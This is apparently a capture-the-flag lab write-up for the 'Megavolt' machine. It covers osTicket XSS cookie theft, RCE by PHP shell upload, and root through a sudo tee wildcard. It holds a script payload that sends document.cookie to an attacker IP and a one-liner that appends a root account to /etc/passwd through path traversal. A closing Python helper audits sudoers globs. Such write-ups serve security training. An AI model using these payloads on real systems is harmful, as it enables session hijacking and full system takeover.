# Megavolt

## Gaining Access

Nmap scan:

```
$ nmap -p- --min-rate 3000 -Pn 192.168.183.115
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 13:29 +08
Nmap scan report for 192.168.183.115
Host is up (0.17s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT   STATE  SERVICE
22/tcp open   ssh
80/tcp open   http
```

We can start proxying traffic through Burp.

### OSTicket -> XSS Admin Cookie

Port 80 hosted an OSTicket instance, which has many published vulnerabilities and exploits:

<figure><img src="/files/4CaAfeXdkyqAko3EPccb" alt=""><figcaption></figcaption></figure>

I registered a new user and opened a ticket. When I viewed the status, it seems that an 'Alfred Smith' closes the tickets:

<figure><img src="/files/QfwANmuUjUi9mmREN3Gz" alt=""><figcaption></figcaption></figure>

This confirms that a user is indeed viewing the tickets, and we can try to use an XSS exploit for it. The file upload function is vulnerable to an XSS exploit:

{% embed url="https://www.exploit-db.com/exploits/47224" %}

We can upload this HTML file to steal the administrator's cookie:

{% code overflow="wrap" %}

```markup
<script>new Image().src='http://192.168.45.208/?cookie=' + encodeURI(document.cookie);</script>
```

{% endcode %}

As soon as we upload the file and submit a new ticket, we get this on a listener port:

<figure><img src="/files/sSAqXqq8pOgkxbg6W1FD" alt=""><figcaption></figcaption></figure>

Using this cookie (it is readable from JavaScript, so it is not marked `HttpOnly`), we can then log in to OSTicket at `/scp` by swapping our cookie for it within Burp:

<figure><img src="/files/rqTjTO7MM7PdkC2sVUHt" alt=""><figcaption></figcaption></figure>

### OSTicket RCE

Within the settings of the Admin Panel, we can find the version of OSTicket running:

<figure><img src="/files/ite3bDdIv5FgojeUgl9X" alt=""><figcaption></figcaption></figure>

This version is vulnerable to an RCE exploit. To exploit it, we first need to enable the plugin that stores attachments within the file system of the machine:

<figure><img src="/files/wPzE9CJ6he0hDATbIzpG" alt=""><figcaption></figcaption></figure>

Afterwards, in the settings, make sure to change the Attachment settings:

<figure><img src="/files/Pz4rrBqjNW4w0YxK4cfc" alt=""><figcaption></figcaption></figure>

Then, we need to open a new ticket and upload a PHP reverse shell.

<figure><img src="/files/jodUxZp2BgWReHCc8qMq" alt=""><figcaption></figcaption></figure>

View the ticket from the Administrator account:

<figure><img src="/files/vqtlnx1bprI1UNUO9m2k" alt=""><figcaption></figcaption></figure>

If we click on the attachment, it generates a GET request to `file.php` with a key:

<figure><img src="/files/qOUmqy25JvRCKDe3Ndqw" alt=""><figcaption></figcaption></figure>

This is the URL key, and we need one more key, the File key, which can be generated as follows:

```
$ php -a 
Interactive shell

php > $sha1 = base64_encode(sha1_file('shell.php', true));
php > print(str_replace(array('=','+','/'), array('','-','_'), $sha1));
Y2_qPxdA2XMAeDyyloBdYykx9uE
```

Then, we can finally use this repository's script to trigger the shell:

{% embed url="https://github.com/Und3r-r00t/osticket-shell" %}

The exploit took me quite a few tries before it worked. If it doesn't work, upload your shell with a different name. In my case, `shell.php` worked.

<figure><img src="/files/zvEZWseAb8uthd3ejfgn" alt=""><figcaption></figcaption></figure>

The script brute-forces every possible directory the PHP shell could have been stored in, then executes it:

<figure><img src="/files/RYeNtCBxgTUdTwBK7YQW" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### Sudo Tee + Wildcard -> Root

We can check our `sudo` privileges on the machine:

```
bash-4.2$ sudo -l 
Matching Defaults entries for apache on megavolt:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User apache may run the following commands on megavolt:
    (ALL) NOPASSWD: /usr/bin/tee /var/log/httpd/*
```

Because the argument is matched as a glob, the `*` also matches `../`, so `tee` can be pointed at any file on the system rather than only files under `/var/log/httpd/`. First, generate a new password hash:

```
$ openssl passwd -1 hello123
$1$/l2LqOov$SE/j5UXGMIShXVQVjiEjJ.
```

Then, write this to the `/etc/passwd` file using this one-liner:

{% code overflow="wrap" %}

```bash
# /etc/passwd entries need seven colon-separated fields: name:hash:UID:GID:GECOS:home:shell
(cat /etc/passwd && echo 'innocent:$1$/l2LqOov$SE/j5UXGMIShXVQVjiEjJ.:0:0::/root:/bin/sh') | sudo tee /var/log/httpd/../../../../../../etc/passwd
```

{% endcode %}

This would add our new entry into the `/etc/passwd` file and we can `su` to become `root`:

<figure><img src="/files/NnekNYxABlZno4Azr404" alt=""><figcaption></figcaption></figure>
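To see why the wildcard in that rule is the real problem, here is an added Python audit helper (not part of the original writeup and not sudo's own code) that flags sudoers argument globs whose `*` can be satisfied by a `../` traversal; it assumes, as observed above, that sudo matches the argument string with fnmatch-style globbing in which `*` also matches `/`. The sample rules and the probe path are constructed for the example.

```python
import fnmatch
import posixpath

# Constructed sample rules (command, argument pattern) for the audit; the first
# is the rule shown by `sudo -l` above, the others are variants for comparison.
SAMPLE_RULES = [
    ("/usr/bin/tee", "/var/log/httpd/*"),
    ("/usr/bin/tee", "/var/log/httpd/*.log"),
    ("/usr/bin/tee", "/var/log/httpd/access_log"),
]


def resolved_path(arg: str) -> str:
    """Collapse '.' and '..' the way the kernel will when the path is opened."""
    return posixpath.normpath(arg)


def escapes_intended_dir(arg_glob: str) -> bool:
    """True if the glob accepts an argument that resolves outside its literal
    directory prefix.  fnmatchcase() behaves like fnmatch(3) without
    FNM_PATHNAME: '*' matches '/' and '..' as ordinary characters, which is
    what lets the tee rule above write anywhere on the file system."""
    if "*" not in arg_glob:
        return False                      # exact argument: nothing to traverse
    prefix, suffix = arg_glob.split("*", 1)[0], arg_glob.rsplit("*", 1)[1]
    sep = "" if prefix.endswith("/") else "/"
    probe = prefix + sep + "../escaped" + suffix   # constructed probe, one level up
    if not fnmatch.fnmatchcase(probe, arg_glob):
        return False
    intended = resolved_path(prefix) + "/"
    return not resolved_path(probe).startswith(intended)


def audit(rules):
    """Return the (command, pattern) pairs whose pattern allows traversal."""
    return [(cmd, pat) for cmd, pat in rules if escapes_intended_dir(pat)]


if __name__ == "__main__":
    for cmd, pat in audit(SAMPLE_RULES):
        print(f"wildcard escape: {cmd} {pat}")
    # The path used in the one-liner above resolves to /etc/passwd
    print(resolved_path("/var/log/httpd/../../../../../../etc/passwd"))
```

A pattern cannot be tightened to exclude `..`, because `*` is matched against the raw string before any path resolution; the fix is to list the permitted log files explicitly instead of using a glob.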

Rooted!


